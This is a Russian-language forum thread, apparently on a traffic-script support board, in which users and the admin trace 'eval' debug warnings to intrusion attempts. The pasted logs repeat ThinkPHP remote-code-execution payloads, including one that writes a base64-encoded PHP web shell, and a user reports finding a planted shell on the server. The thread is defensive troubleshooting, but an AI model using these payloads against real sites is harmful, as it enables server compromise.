Query w eval (debug: /*check query*/ ): UPDATE traders SET similarweb_info

Axcel · Post by **Axcel** » Sat Jul 16, 2022 11:57 pm

Ещё одна ошибка после апа.

Query w eval (debug: /*check query*/ ): UPDATE traders SET similarweb_info = 'a:11:{s:11:\"Description\";s:162:\"<br /><b>warning</b>:  readfile(): filename cannot be empty in <b>/home/ТУТ_ПУТЬ_НЕ_К_МОЕМУ_ДОМЕНУ_,_А_К_ДОМЕНУ_ТРЕЙДЕРА/mm6vsp/tube/index.php(953) : eval()\'d code</b> on line <b>6</b>

Post by **admin** » Sun Jul 17, 2022 8:34 am

да на это мдомене была ошибка на индексе (точнее в его темплейтах)
можно просто удалить, ничего на своем сайте делать не надо
отлично что варнинг на eval сработал, полезная добавка получилась

darkover · Post by **darkover** » Sun Jul 17, 2022 2:55 pm

Он так же срабатывает, если есть в рефе какой-то eval

Query w eval (debug: /*check query*/ ): INSERT IGNORE into refs (trader, hour, referer, num) VALUES ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_1.smartcj.broker', '460527', '', '3'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_2.smartcj.broker', '460527', '', '3'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_3.smartcj.broker', '460527', '', '3'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_4.smartcj.broker', '460527', '', '3'), ('spiders', '460527', '', '3') ON DUPLICATE KEY UPDATE num=num + VALUES(num) , request Array ( [cron.php] => [мойстайт.com] => ) , Array ( [0] => Array ( [file] => /home/domains/www/мойстайт.com/scj/bin/cron.php [line] => 2142 [function] => db_query [args] => Array ( [0] => INSERT IGNORE into refs (trader, hour, referer, num) VALUES ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_1.smartcj.broker', '460527', '', '3'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_2.smartcj.broker', '460527', '', '3'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_3.smartcj.broker', '460527', '', '3'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_4.smartcj.broker', '460527', '', '3'), ('spiders', '460527', '', '3') ON DUPLICATE KEY UPDATE num=num + VALUES(num) ) ) [1] => Array ( [file] => /home/domains/www/мойстайт.com/scj/bin/cron.php [line] => 70 [function] => process_traffic [args] => Array ( ) ) )

Post by **admin** » Mon Jul 18, 2022 4:36 am

darkover wrote: ↑Sun Jul 17, 2022 2:55 pm Он так же срабатывает, если есть в рефе какой-то eval

Query w eval (debug: /*check query*/ ): INSERT IGNORE into refs (trader, hour, referer, num) VALUES ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_1.smartcj.broker', '460527', '', '3'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_2.smartcj.broker', '460527', '', '3'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_3.smartcj.broker', '460527', '', '3'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_4.smartcj.broker', '460527', '', '3'), ('spiders', '460527', '', '3') ON DUPLICATE KEY UPDATE num=num + VALUES(num) , request Array ( [cron.php] => [мойстайт.com] => ) , Array ( [0] => Array ( [file] => /home/domains/www/мойстайт.com/scj/bin/cron.php [line] => 2142 [function] => db_query [args] => Array ( [0] => INSERT IGNORE into refs (trader, hour, referer, num) VALUES ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_1.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_1.smartcj.broker', '460527', '', '3'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_2.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_2.smartcj.broker', '460527', '', '3'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_3.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_3.smartcj.broker', '460527', '', '3'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com/', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//index.php', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/\\think\\template\\driver\\file/write&cacheFile=robots1.php&content=xbshell', '1'), ('7_4.smartcj.broker', '460527', 'https://www.мойстайт.com//?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=%201),%20array(', '1'), ('7_4.smartcj.broker', '460527', '', '3'), ('spiders', '460527', '', '3') ON DUPLICATE KEY UPDATE num=num + VALUES(num) ) ) [1] => Array ( [file] => /home/domains/www/мойстайт.com/scj/bin/cron.php [line] => 70 [function] => process_traffic [args] => Array ( ) ) )

вы вырезали чатсь где eval ? что то я тут не вижу слова eval

darkover · Post by **darkover** » Mon Jul 18, 2022 9:01 am

admin wrote: ↑Mon Jul 18, 2022 4:36 am вы вырезали чатсь где eval ? что то я тут не вижу слова eval

Я видимо не докопипастил весь запрос
присутствует

Code: Select all

/?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=
@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));', '1'),

Post by **admin** » Mon Jul 18, 2022 2:17 pm

отлично, спасибо, это просто пытаются ломать через подскановку разного в строку поиска, если у вас в темпелйте нет вывода переменных без эскейпа то никаких проблем не будет.

если будут еще такого плана сообщения то дайте знать плз

darkover · Post by **darkover** » Mon Jul 18, 2022 4:27 pm

admin wrote: ↑Mon Jul 18, 2022 2:17 pm отлично, спасибо, это просто пытаются ломать через подскановку разного в строку поиска, если у вас в темпелйте нет вывода переменных без эскейпа то никаких проблем не будет.

если будут еще такого плана сообщения то дайте знать плз

Да гдет пролили шел, перетряхиваю сервак сейчас, гдет было без эскейпов.

Post by **admin** » Mon Jul 18, 2022 4:30 pm

те на серваке лежит сам файл с шелом на каком то из доменов?

darkover · Post by **darkover** » Mon Jul 18, 2022 4:49 pm

admin wrote: ↑Mon Jul 18, 2022 4:30 pm те на серваке лежит сам файл с шелом на каком то из доменов?

Да, нашел в /scj/cgi -т.к. это единственная папка которая не закрыта htaccess
только не знаю когда пролили, не трогал сайты и админки вообще с конца прошлого года. Дата файла январь 22, но сам знаешь, что через touch можно все что угодно сделать. А логов нет за то время, так что сказать о том, что через смарт залили или нет, не могу, но юзер и группа файла - чисто те, что под смарт используются. Хрен знает короче, гемора прибыло ))

darkover · Post by **darkover** » Mon Jul 18, 2022 4:53 pm

Я думаю аут из /scj/cgi кинуть симлинком в корень и рерайты через него прямо делать, а /scj/cgi - закрыть нафиг через htacess, что бы /scj/* вообще не отсвечивало в мир.

Query w eval (debug: /check query/ ): UPDATE traders SET similarweb_info

Query w eval (debug: /check query/ ): UPDATE traders SET similarweb_info

Re: Query w eval (debug: /check query/ ): UPDATE traders SET similarweb_info

Re: Query w eval (debug: /check query/ ): UPDATE traders SET similarweb_info

Re: Query w eval (debug: /check query/ ): UPDATE traders SET similarweb_info

Re: Query w eval (debug: /check query/ ): UPDATE traders SET similarweb_info

Re: Query w eval (debug: /check query/ ): UPDATE traders SET similarweb_info

Re: Query w eval (debug: /check query/ ): UPDATE traders SET similarweb_info

Re: Query w eval (debug: /check query/ ): UPDATE traders SET similarweb_info

Re: Query w eval (debug: /check query/ ): UPDATE traders SET similarweb_info

Re: Query w eval (debug: /check query/ ): UPDATE traders SET similarweb_info